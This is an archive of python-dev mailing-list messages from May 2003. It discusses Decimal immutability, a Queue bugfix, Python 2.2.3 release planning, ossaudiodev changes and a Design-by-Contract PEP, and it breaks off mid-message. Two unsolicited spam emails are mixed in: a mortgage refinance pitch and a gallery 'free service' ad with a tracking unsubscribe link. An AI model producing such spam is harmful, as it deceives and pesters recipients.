about it."  --Tim Peters on Python, 16 Sep 93


From greg@cosc.canterbury.ac.nz  Mon May 26 23:45:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 27 May 2003 10:45:27 +1200 (NZST)
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <200305262245.h4QMjRc05319@oma.cosc.canterbury.ac.nz>

Kevin Jacobs <jacobs@penguin.theopalgroup.com>:

> Does anyone else have feelings for or against having mutable Decimal
> instances?

Having mutable decimal instances would feel *very* strange
to me, given that all other numeric types in Python are
immutable.

+1 on making them immutable.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@comcast.net  Tue May 27 00:13:17 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 26 May 2003 19:13:17 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <200305262245.h4QMjRc05319@oma.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFPEHAB.tim.one@comcast.net>

[Greg Ewing]
> Having mutable decimal instances would feel *very* strange
> to me, given that all other numeric types in Python are
> immutable.
>
> +1 on making them immutable.

I don't believe there's any argument in favor of making them mutable.  The
question may arise because my old FixedPoint class had mutable instances.
That was a mistake -- I wrote that class in an afternoon, and wasn't
thinking when I added the .set_precision() method.  If they're not
immutable, they can't be used as dict keys, and that's a killer-strong
argument all by itself.



From r.vanputten@hexapole.com  Tue May 27 09:28:52 2003
From: r.vanputten@hexapole.com (Rob van Putten)
Date: Tue, 27 May 2003 10:28:52 +0200
Subject: [Python-Dev] install debian package
Message-ID: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>

Hi there,

I am not sure if this is the right place for my comment but here it is;

I tried to install python-dev on my new Debian woody system but it
returned an error because it tried to remove the modutils package
(probably because it was incompatible)

The problem was solved after I upgraded the modutils package
(2.4.21-2)

I am no debain package expert but it looks to me as if the modutils
package should be upgraded from the python-dev package (if this
is somehow possible off course :-)

Hope this helps to improve the debian package.

Regards,
Rob




From gh@ghaering.de  Tue May 27 09:54:27 2003
From: gh@ghaering.de (=?windows-1252?Q?Gerhard_H=E4ring?=)
Date: Tue, 27 May 2003 10:54:27 +0200
Subject: [Python-Dev] install debian package
In-Reply-To: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>
References: <7JELK71URD0SPXU73UQ84KJC795KJNM.3ed321c4@rob_pc>
Message-ID: <3ED327C3.7050608@ghaering.de>

Rob van Putten wrote:
> Hi there,
> 
> I am not sure if this is the right place for my comment but here it is;

It isn't the right place. This is the list for development of Python 
itself, not for the Debian package.

> I tried to install python-dev on my new Debian woody system but it
> returned an error because it tried to remove the modutils package
> (probably because it was incompatible) [...]

I'd suggest you contact either the Debian-Python mailing list 
(http://lists.debian.org/debian-python/), or the maintainer itself. 
Personally I didn't have this problem on Woody, btw.

Or just report it to the Debian bugtracking system using for example 
'reportbug'.

-- Gerhard



From skip@pobox.com  Wed May 28 02:21:34 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 27 May 2003 20:21:34 -0500
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
Message-ID: <16084.3870.666366.928341@montanaro.dyndns.org>

Several times today I had a Queue object (Python 2.2.2) wind up deadlocked
with its fsema locked but its queue full (apparently threads are waiting to
put more items in the queue than it's supposed to hold).  Looking back at
the cvs log for the Queue module I see this message

    revision 1.15
    date: 2002/04/19 00:11:31;  author: mhammond;  state: Exp;  lines: +33 -14
    Fix bug 544473 - "Queue module can deadlock".
    Use try/finally to ensure all Queue locks remain stable.
    Includes test case.  Bugfix candidate.

but no indication that was ever applied to the maint22 branch.

I'm not suggesting that this bug fix will solve my problem (it's probably a
bug in my code), but it seems that it should have been applied but wasn't.
Should it be applied at this point or is 2.2.3 too close to release?

Skip


From guido@python.org  Wed May 28 12:20:39 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 28 May 2003 07:20:39 -0400
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
In-Reply-To: "Your message of Tue, 27 May 2003 20:21:34 CDT."
 <16084.3870.666366.928341@montanaro.dyndns.org>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
Message-ID: <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>

> Several times today I had a Queue object (Python 2.2.2) wind up deadlocked
> with its fsema locked but its queue full (apparently threads are waiting to
> put more items in the queue than it's supposed to hold).  Looking back at
> the cvs log for the Queue module I see this message
> 
>     revision 1.15
>     date: 2002/04/19 00:11:31;  author: mhammond;  state: Exp;  lines: +33 -14
>     Fix bug 544473 - "Queue module can deadlock".
>     Use try/finally to ensure all Queue locks remain stable.
>     Includes test case.  Bugfix candidate.
> 
> but no indication that was ever applied to the maint22 branch.

cvs log of the release22-maint branch shows it was applied.

> I'm not suggesting that this bug fix will solve my problem (it's probably a
> bug in my code), but it seems that it should have been applied but wasn't.
> Should it be applied at this point or is 2.2.3 too close to release?

Are you using the tip of the branch is the next question?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May 28 13:52:25 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 28 May 2003 07:52:25 -0500
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it
 applied?
In-Reply-To: <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
 <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16084.45321.727469.548923@montanaro.dyndns.org>

    Guido> cvs log of the release22-maint branch shows it was applied.
    ...
    Guido> Are you using the tip of the branch is the next question?

I guess I misunderstood how "cvs log" worked.  Given "cvs log foo" I thought
it would list the checkin comments for all versions and all branches of foo.
I didn't think it mattered which version of the file I asked about.

Skip



From terry@wayforward.net  Wed May 28 18:32:29 2003
From: terry@wayforward.net (Terence Way)
Date: Wed, 28 May 2003 13:32:29 -0400
Subject: [Python-Dev] Introduction
Message-ID: <5B3B5FCE-9132-11D7-BD8E-00039344A0EC@wayforward.net>

I've been lurking for a bit, and now seems like a good time to
introduce myself.

* I build messaging systems for banks, earlier I was CTO of a dot-com.
* I started programming on the TRS-80 and the RCA COSMAC VIP, later
   on the Apple ][.
* I am a Java refugee (well, I might still code in Java for pay).
* I'm into formal methods.  Translation: I like *talking* about
   formal methods, but I never use them myself :-)

I read somewhere that the best way to build big Python callouses was
to write a PEP.  Here goes:
     http://www.wayforward.net/pycontract/pep-0999.html

Programming by Contract for Python... pre-conditions, post-conditions,
invariants, with all the Eiffel goodness like weakening pre-conditions
and strengthening invariants and post-conditions on inheritance, and
access to old values.  All from docstrings, like doctest.

I'm also into handling insane numbers of incoming connections on cheap
boxes: compare Jef Poskanzer's thttpd to Apache.  10000 simultaneous
HTTP connections on a $400 computer just gets me giggling.  Stackless
Python intrigues me greatly for the same reason.

I guess that's it for now...  Cheers!



From pje@telecommunity.com  Wed May 28 19:23:39 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 28 May 2003 14:23:39 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <5B3B5FCE-9132-11D7-BD8E-00039344A0EC@wayforward.net>
Message-ID: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>

At 01:32 PM 5/28/03 -0400, Terence Way wrote:

>I read somewhere that the best way to build big Python callouses was
>to write a PEP.

Guess I'll start helping you work on the callouses, then.  :)


>   Here goes:
>     http://www.wayforward.net/pycontract/pep-0999.html

Please don't number a pre-PEP;  I believe PEP 1 recomends using 'XXX' until 
a PEP number has been assigned by the PEP editors.


>Programming by Contract for Python... pre-conditions, post-conditions,
>invariants, with all the Eiffel goodness like weakening pre-conditions
>and strengthening invariants and post-conditions on inheritance, and
>access to old values.  All from docstrings, like doctest.

A number of things aren't clear from your PEP.  For example, how would 
syntax errors in assertions be handled?  How is backward compatibility with 
existing docstrings that may use 'inv:' or 'pre:' to specify conditions 
informally?

Are you proposing that this be part of Python's core syntax?  If so, then 
why do it as docstrings?  Are you proposing instead that your 
implementation be part of the standard library?  If so, then where is the 
documentation for how a developer enables the behavior?

Also, I didn't find the motivation section convincing.  Your answer to "Why 
not have several different implementations, or let programmers implement 
their own assertions?" isn't actually a justification.  If Alice uses some 
package to wrap her methods with checks, I can weaken the preconditions in 
a subclass, by simply overriding the methods.  If I can't do that, then it 
is a weakness of the DBC package Alice used, or of Alice's package, not a 
weakness of Python.



From barry@python.org  Wed May 28 19:46:13 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 14:46:13 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
Message-ID: <1054147573.10580.20.camel@barry>

I've not heard about any showstoppers for Python 2.2.3.  Just to let
everyone know, I'd like to release it Some PM, this Friday night, EDT. 
I'll need to coordinate specifics with Fred and Tim, but expect a
check-in freeze on the branch at some point Friday, with a release to
follow shortly thereafter.

-Barry




From terry@wayforward.net  Wed May 28 20:37:14 2003
From: terry@wayforward.net (Terence Way)
Date: Wed, 28 May 2003 15:37:14 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 02:23  PM, Phillip J. Eby wrote:

> Please don't number a pre-PEP;  I believe PEP 1 recomends using 'XXX' 
> until a PEP number has been assigned by the PEP editors.
>
Ack.  Oops.  I've sent it off to peps@python.org with the XXX, but 
posted
here with the 999.

> A number of things aren't clear from your PEP.  For example, how would 
> syntax errors in assertions be handled?  How is backward compatibility 
> with existing docstrings that may use 'inv:' or 'pre:' to specify 
> conditions informally?
Um.  No thought given to that.  My first guess is: syntax errors printed
to standard error, optionally silently ignored, no safety checks 
installed
either way.  Run-time errors trapped and re-raised as some kind of
ContractViolation::

     def read_stuff(input)
         """pre: input.readline"""

would be valid, and the AttributeError would be wrapped inside a
PreconditionViolationError if the ``input`` parameter isn't some
type of input stream.

> Are you proposing that this be part of Python's core syntax?  If so, 
> then why do it as docstrings?  Are you proposing instead that your 
> implementation be part of the standard library?  If so, then where is 
> the documentation for how a developer enables the behavior?
Proposing that some implementation, hopefully mine, be put in the
standard library.  I *really* don't think contracts should be part of 
the
core syntax: contracts belong in the documentation, and changing all the
doc tools to parse code looking for contract assertions is harder than
building one or two docstring implementations.

self.note(): where *is* the documentation on how to enable the
behavior.

> Also, I didn't find the motivation section convincing.  Your answer to 
> "Why not have several different implementations, or let programmers 
> implement their own assertions?" isn't actually a justification.  If 
> Alice uses some package to wrap her methods with checks, I can weaken 
> the preconditions in a subclass, by simply overriding the methods.  If 
> I can't do that, then it is a weakness of the DBC package Alice used, 
> or of Alice's package, not a weakness of Python.
Consider when Alice's preconditions work, but Bob's do not.  Code that
thinks it's calling Alice's code *must not* break when calling Bob's.
Weakening pre-conditions means that Alice's pre-conditions must be
tested as well: and Bob's code is run even if his pre-conditions fail.
The converse is also true: code that understands Bob's pre-conditions
must not fail even if Alice's pre-conditions fail.  This is tough to
do with asserts, or with incompatible contract packages.

I haven't made that clear in the PEP or the samples, and it needs to
be clear, because it is the /only/ reason why contracts need to be in
the language/standard runtime.

Excellent points, thanks for taking an interest.



From tim@zope.com  Wed May 28 21:03:59 2003
From: tim@zope.com (Tim Peters)
Date: Wed, 28 May 2003 16:03:59 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <1054147573.10580.20.camel@barry>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>

[Barry]
> I've not heard about any showstoppers for Python 2.2.3.

Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary which I
fixed in 2.3 but am waiting to hear from Fred about before backporting, the
other a segfault I think I traced to subtype_dealloc then assigned to Guido.
The segfault should be a showstopper:

    http://www.python.org/sf/742911



From tim.one@comcast.net  Wed May 28 21:08:48 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 28 May 2003 16:08:48 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>

[Tim]
> Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary

Nope, WeakKeyDictionary.

> which I fixed in 2.3 but am waiting to hear from Fred about before
> backporting, the other a segfault I think I traced to subtype_dealloc
> then assigned to Guido. The segfault should be a showstopper:
>
>     http://www.python.org/sf/742911

No change there.


From barry@python.org  Wed May 28 21:22:00 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 16:22:00 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEAGEIAB.tim.one@comcast.net>
Message-ID: <1054153320.12509.3.camel@barry>

On Wed, 2003-05-28 at 16:08, Tim Peters wrote:
> [Tim]
> > Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary
> 
> Nope, WeakKeyDictionary.
> 
> > which I fixed in 2.3 but am waiting to hear from Fred about before
> > backporting, the other a segfault I think I traced to subtype_dealloc
> > then assigned to Guido. The segfault should be a showstopper:
> >
> >     http://www.python.org/sf/742911
> 
> No change there.

Guido promised to look into the latter.  We'll withhold lunch from Fred
until he looks at the former.

kung-pao-ish-ly y'rs,
-Barry




From 4va5kpg1@yahoo.com  Wed May 28 18:32:26 2003
From: 4va5kpg1@yahoo.com (Loren Mcdaniel)
Date: Wed, 28 May 03 17:32:26 GMT
Subject: [Python-Dev] Refinance your home with lowest rates  lqjq c cipem
Message-ID: <9v---c$kt8ar-x-115hg61-xq39-$6@pkj.p.l2k.n9>

This is a multi-part message in MIME format.

--57A_ECAF9F3DF_A2DDB.
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

FREE MORTGAGE QUOTE & BEST POSSIBLE RATES !
-------------------------------------------


There are over 89,000 mortgage companies in the U.S., which means the 
process of finding the best loan for you can be a very difficult one.Let 
us do the hard work for you!

Simply spend 1 minute to fill out the short form, then press the submit 
button, and we take it from there... finding the best deals possible, 
and getting the lenders to contact you! It's short, it's simple, it's 
free, and it will save you thousands of dollars!

* Home Improvement, Refinance, Second Mortgage, Home Equity Loans, and 
More! Even with less than perfect or NO credit!

You will qualify for the best possible rate. Do NOT miss the chance to 
refinance at record low rates, so act now...

http://mymortagenow.com/3/index.asp?RefID=3D383102 











remove me
http://www.mortage-area.com/Auto/index.htm





eamor d aoiotcm auvwi zt  v u awokik  tn
gz  kxcgc bchjfq wz
gzsrh bmj
--57A_ECAF9F3DF_A2DDB.--



From pjones@redhat.com  Wed May 28 21:55:56 2003
From: pjones@redhat.com (Peter Jones)
Date: Wed, 28 May 2003 16:55:56 -0400 (EDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>
Message-ID: <Pine.LNX.4.44.0305281548150.19024-100000@devserv.devel.redhat.com>

Hi, I'm Peter.  Long time listener, first time caller.

On Wed, 28 May 2003, Terence Way wrote:

> > A number of things aren't clear from your PEP.  For example, how would
> > syntax errors in assertions be handled?  How is backward compatibility
> > with existing docstrings that may use 'inv:' or 'pre:' to specify
> > conditions informally?
>
> Um.  No thought given to that.  My first guess is: syntax errors printed
> to standard error, optionally silently ignored, no safety checks
> installed either way.

It seems like either of these methods of coping with legacy docstrings
thwart your basic premises.  Unless the well-formed nature of the
contracts are enforced, it seems to be fairly difficult to e.g.  randomly
test a function.  

What if the docstring fails to parse?  I have to be listening to stderr to
know that it didn't work.  I then have to parse the message from stderr to
figure out which function didn't work, and finally I have to somehow mark 
this function as not compliant, and ignore whatever results I get.

It really seems like you want them either "on" or "off", not "on, but it 
might fail in some silent or hard to trap way".

> > Are you proposing that this be part of Python's core syntax?  If so, 
> > then why do it as docstrings?  Are you proposing instead that your 
> > implementation be part of the standard library?  If so, then where is 
> > the documentation for how a developer enables the behavior?
>
> Proposing that some implementation, hopefully mine, be put in the
> standard library.  I *really* don't think contracts should be part of
> the core syntax: contracts belong in the documentation, and changing all
> the doc tools to parse code looking for contract assertions is harder
> than building one or two docstring implementations.

The assertion that contracts don't belong in the core seems entirely
seperate from the discussion of their place in docstrings or in real code.

That being said, you still haven't explained *why* contracts belong in
docstrings (or in documentation in general).  They are executable code;  
why not treat them as such?

> self.note(): where *is* the documentation on how to enable the
> behavior.

I suspect we have to know this before we can know which way is easier.  

That being said, I really don't see how these contracts can be meaningful
as part of a docstring without some better mechanism for handling old
docstrings that have been ruled malformed.  What's your reasoning against
making them their own kind of block, like "try:"?

-- 
        Peter





From patmiller@llnl.gov  Wed May 28 22:01:24 2003
From: patmiller@llnl.gov (Pat Miller)
Date: Wed, 28 May 2003 14:01:24 -0700
Subject: [Python-Dev] Introduction
References: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <3ED523A4.7030405@llnl.gov>

> http://www.wayforward.net/pycontract/pep-0999.html

I think another issue with using doc strings in this way
is that you are overloading a feature visible to end users.

If I look at the doc string then I would expect to be confused the result:

 >>> help(circbuf)
Help on class circbuf in module __main__:

class circbuf
  |  Methods defined here:
  |
  |  get(self)
  |      Pull an entry from a non-empty circular buffer.
  |
  |      pre: not self.is_empty()
  |      post[self.g, self.len]:
  |          __return__ == self.buf[__old__.self.g]
  |          self.len == __old__.self.len - 1
  | ...

Way to cryptic even for me :-)

I think you could get the same effect by overloading property
so you could make methods "smart" about pre and post conditions
The following is a first quick hack at it...:

class eiffel(property):
     """eiffel(method,precondition,postcondition)

     Implement a Eiffel style method that enforces pre-
     and post- conditions.  I guess you could turn this
     on and off if you wanted...

     class foo:
       def pre(self): assert self.x > 0
       def post(self):  assert self.x > 0
       def increment(self):
           self.x += 1
           return

       increment = eiffel(method,precondition,postcondition)
     """

     def __init__(self,method,precondition,postcondition,doc=None):
	self.method	= method
	self.precondition	= precondition
	self.postcondition	= postcondition
         super(eiffel,self).__init__(self.__get,None,None,doc)
	return


     def __get(self,this):
         class funny_method:
             def __init__(self,this,method,precondition,postcondition):
                 self.this	= this
                 self.method	= method
                 self.precondition	= precondition
                 self.postcondition	= postcondition
                 return
             def __call__(self,*args,**kw):
                 self.precondition(self.this)
                 value = self.method(self.this,*args,**kw)
                 self.postcondition(self.this)
                 return value

         return funny_method(this,self.method,self.precondition,self.postcondition)



class circbuf:
     def __init__(self):
         self.stack = []
         return

     def _get_pre(self):
         assert not self.is_empty()
         return
     def _get_post(self):
         assert not self.is_empty()
         return
     def _get(self):
         """Pull an entry from a non-empty circular buffer."""
         val = self.stack[-1]
         del self.stack[-1]
         return val

     get = eiffel(_get,_get_pre,_get_post)

     def put(self,val):
         self.stack.append(val)
         return

     def is_empty(self):
         return len(self.stack) == 0


B = circbuf()
B.put('hello')
print B.get()

# Will bomb...
print B.get()


-- 
Patrick Miller | (925) 423-0309 | http://www.llnl.gov/CASC/people/pmiller

If you think you can do a thing or think you can't do a thing, you're
right.  -- Henry Ford



From pje@telecommunity.com  Wed May 28 23:05:30 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Wed, 28 May 2003 18:05:30 -0400
Subject: [Python-Dev] Contracts PEP (was re: Introduction)
In-Reply-To: <C88C443E-9143-11D7-BD8E-00039344A0EC@wayforward.net>
References: <5.1.1.6.0.20030528140810.0249d640@telecommunity.com>
Message-ID: <5.1.1.6.0.20030528174512.01eb5e50@telecommunity.com>

At 03:37 PM 5/28/03 -0400, Terence Way wrote:
>On Wednesday, May 28, 2003, at 02:23  PM, Phillip J. Eby wrote:
>>Also, I didn't find the motivation section convincing.  Your answer to 
>>"Why not have several different implementations, or let programmers 
>>implement their own assertions?" isn't actually a justification.  If 
>>Alice uses some package to wrap her methods with checks, I can weaken the 
>>preconditions in a subclass, by simply overriding the methods.  If I 
>>can't do that, then it is a weakness of the DBC package Alice used, or of 
>>Alice's package, not a weakness of Python.
>Consider when Alice's preconditions work, but Bob's do not.  Code that
>thinks it's calling Alice's code *must not* break when calling Bob's.

Okay, you've completely lost me now, because I don't know what you mean by 
"work" in this context.  Do you mean, "are met by the caller"?  Or "are 
syntactically valid"?  Or...?


>Weakening pre-conditions means that Alice's pre-conditions must be
>tested as well: and Bob's code is run even if his pre-conditions fail.

Whaa?  That can't be right.  Weakening a precondition means that Bob's 
preconditions should *replace* Alice's preconditions, if Bob has supplied 
newer, weaker preconditions.  Bob's code should *not* be run if Bob's 
preconditions are not met.

Just to make sure we're not on completely different pages here, I'm 
thinking this:

class AlicesClass:
     def something(self):
         """pre: foo and bar"""

class BobsClass(AlicesClass):
     def something(self):
         """pre: foo"""

That, to me, is weakening a precondition.  Now, if what you're saying is 
that Bob's code must work if *Alice's* preconditions are met, then that's 
something different.  What you're saying then, is that it's required that a 
precondition in a subclass be logically implied by each of the 
corresponding preconditions in the base classes.

That is certainly a reasonable requirement, but I don't see why the 
language needs to enforce it, certainly not by running Bob's code even when 
Bob's precondition fails!  If you're going to enforce it, it should be 
enforced by issuing an error for preconditions that aren't logically 
implied by their superclass preconditions.  Then you actually get some 
benefit from the static checking.  If you just run Bob's code, he has no 
way to notice that he's violating Alice's contract, until his code keeps 
breaking at runtime.  (And then, he will almost certainly come to the 
conclusion that the contract checker is broken!)

OTOH, if you accept Bob's precondition as he stated it, then he gets the 
behavior he asked for.  If this is a violation of Alice's contract, Bob's 
users will either read the fact in his docs, or complain.


>The converse is also true: code that understands Bob's pre-conditions
>must not fail even if Alice's pre-conditions fail.  This is tough to
>do with asserts, or with incompatible contract packages.

I still don't understand.  If Bob has replaced Alice's method, what do her 
preconditions have to do with it any more?  If Bob's code *calls* Alice's 
method, then the conditions of Alice's method presumably *do* need to apply 
for that upcall, or else she has written them without enough indirection.


>I haven't made that clear in the PEP or the samples, and it needs to
>be clear, because it is the /only/ reason why contracts need to be in
>the language/standard runtime.

Yep, and I'm still totally not seeing why Alice and Bob have to use the 
same mechanism.  Alice could use method wrappers, Bob could use a 
metaclass, and Carol could use assert statements, as far as I can see, 
unless you are looking for static correctness checking.  (In which case, 
docstrings are the wrong place for this.)



From barry@python.org  Wed May 28 23:09:50 2003
From: barry@python.org (Barry Warsaw)
Date: 28 May 2003 18:09:50 -0400
Subject: [Python-Dev] Plans for Python 2.2.3 final
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
References: <LNBBLJKPBEHFEDALKOLCIEAFEIAB.tim@zope.com>
Message-ID: <1054159790.4482.0.camel@geddy>

On Wed, 2003-05-28 at 16:03, Tim Peters wrote:
> [Barry]
> > I've not heard about any showstoppers for Python 2.2.3.
> 
> Mike Fletcher submitted two weakref bugs, one in WeakValueDictionary which I
> fixed in 2.3 but am waiting to hear from Fred about before backporting, the
> other a segfault I think I traced to subtype_dealloc then assigned to Guido.
> The segfault should be a showstopper:
> 
>     http://www.python.org/sf/742911

Ok, I just spoke to Fred.  He gives his seal of approval for the weakref
backport.  I'll do that, after testing the patches and backporting the
tests.

Guido's still going to look at the latter bug.

-Barry




From martin@v.loewis.de  Thu May 29 02:03:53 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 29 May 2003 03:03:53 +0200
Subject: [Python-Dev] Python bug 544473 - bugfix candidate - was it applied?
In-Reply-To: <16084.45321.727469.548923@montanaro.dyndns.org>
References: <16084.3870.666366.928341@montanaro.dyndns.org>
 <200305281120.h4SBKdQ11691@pcp02138704pcs.reston01.va.comcast.net>
 <16084.45321.727469.548923@montanaro.dyndns.org>
Message-ID: <m33ciytvgm.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> I guess I misunderstood how "cvs log" worked.  Given "cvs log foo" I thought
> it would list the checkin comments for all versions and all branches of foo.

And indeed that's what it does. Look to the very end of the log.

Regards,
Martin


From gward@python.net  Thu May 29 02:32:29 2003
From: gward@python.net (Greg Ward)
Date: Wed, 28 May 2003 21:32:29 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030529013229.GA19091@cthulhu.gerg.ca>

[me, on ossaudiodev.setparameters()]
> In addition to being silly, this is not the documented interface.  The
> docs don't mention the 'sample_size' argument at all.  Presumably the
> doc writer realized the silliness and was going to pester me to remove
> 'sample_size', but never got around to it.  (Lot of that going around.)
> 
> So, even though we're in a beta cycle, am I allowed to change the code
> so it's 1) sensible and 2) consistent with the documentation?

[Guido]
> Yes.  I like silliness in a MP skit, but not in my APIs. :-)

OK, done.  I've also beefed up the test script a bit.  So, once again,
if you have a Linux or FreeBSD system with working sound card, can you
run

  ./python Lib/test/regrtest.py -uaudio test_ossaudiodev

...preferably before and after a "cvs up && make" to see if things are
better, worse, or unchanged?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
All the world's a stage and most of us are desperately unrehearsed.


From g_a_l_l_a@mail333.com  Thu May 29 08:13:32 2003
From: g_a_l_l_a@mail333.com (g_a_l_l_a@mail333.com)
Date: 29 May 2003 11:13:32 +0400
Subject: [Python-Dev] New free service!  AID:0951460048
Message-ID: <2003.05.29.2F7E2EF61D266809@mail333.com>

We are pleased to inform you that on the Gallery-A site has opened a new 
service.
Now you can absolutely FREE use the best paintings from our gallery to 
decorate the screen of your computer. 
Insert your favorite painting into the frame of your monitor.
http://www.gallery-a.ru/luxury.php
With best regards Boris Lipner


Sorry if that information not interesting for You and we disturb You with 
our message!
For removing yor address from this mailing list just replay this message 
with word 'unsubscribe' in subject field
or simple click this link:
 http://www.gallery-a.ru/unsubscribe.php?e=cHl0aG9uLWRldkBweXRob24ub3JnOjE2ODAwMzcx






From guido@python.org  Thu May 29 15:50:06 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 29 May 2003 10:50:06 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: Your message of "Wed, 28 May 2003 21:32:29 EDT."
 <20030529013229.GA19091@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>
 <20030529013229.GA19091@cthulhu.gerg.ca>
Message-ID: <200305291450.h4TEo6q15846@odiug.zope.com>

> [me, on ossaudiodev.setparameters()]
> > In addition to being silly, this is not the documented interface.  The
> > docs don't mention the 'sample_size' argument at all.  Presumably the
> > doc writer realized the silliness and was going to pester me to remove
> > 'sample_size', but never got around to it.  (Lot of that going around.)
> > 
> > So, even though we're in a beta cycle, am I allowed to change the code
> > so it's 1) sensible and 2) consistent with the documentation?
> 
> [Guido]
> > Yes.  I like silliness in a MP skit, but not in my APIs. :-)
> 
> OK, done.  I've also beefed up the test script a bit.  So, once again,
> if you have a Linux or FreeBSD system with working sound card, can you
> run
> 
>   ./python Lib/test/regrtest.py -uaudio test_ossaudiodev
> 
> ...preferably before and after a "cvs up && make" to see if things are
> better, worse, or unchanged?

Did you check in the changes to ossaudiodev?

A cvs update gave me new test files:

    P Lib/test/test_ossaudiodev.py
    P Lib/test/output/test_ossaudiodev

but no new C code, and now I get this error when I run the above test:

    $ ./python ../Lib/test/regrtest.py -uaudio test_ossaudiodev
    test_ossaudiodev
    test test_ossaudiodev crashed -- exceptions.TypeError: setparameters() takes at least 4 arguments (3 given)
    1 test failed:
	test_ossaudiodev
    $

Before the cvs update, the test produced some audio and then hung;
when I interrupted, here's the traceback:

    Traceback (most recent call last):
      File "../Lib/test/regrtest.py", line 974, in ?
	main()
      File "../Lib/test/regrtest.py", line 264, in main
	ok = runtest(test, generate, verbose, quiet, testdir)
      File "../Lib/test/regrtest.py", line 394, in runtest
	the_package = __import__(abstest, globals(), locals(), [])
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 96, in ?
	test()
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 93, in test
	play_sound_file(data, rate, ssize, nchannels)
      File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 56, in play_sound_file
	a.write(data)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From terry@wayforward.net  Thu May 29 15:53:16 2003
From: terry@wayforward.net (Terence Way)
Date: Thu, 29 May 2003 10:53:16 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.44.0305281548150.19024-100000@devserv.devel.redhat.com>
Message-ID: <47C92342-91E5-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 04:55  PM, Peter Jones wrote:

> What if the docstring fails to parse?  I have to be listening to 
> stderr to
> know that it didn't work.  I then have to parse the message from 
> stderr to
> figure out which function didn't work, and finally I have to somehow 
> mark
> this function as not compliant, and ignore whatever results I get.
>
I probably would have figured that out too, eventually... :-)  More on
this further down, when I talk about how to enable docstring testing.

> That being said, you still haven't explained *why* contracts belong in
> docstrings (or in documentation in general).  They are executable code;
> why not treat them as such?
>
Okay, the whole docstring vs syntax thing, and I'm going to quote
liberally from Bertrand Meyer's Object Oriented Software Construction,
1st edition, 7.9 Using Assertions.

There are four main reasons for adding contracts to code:
"""
* Help in writing correct software.
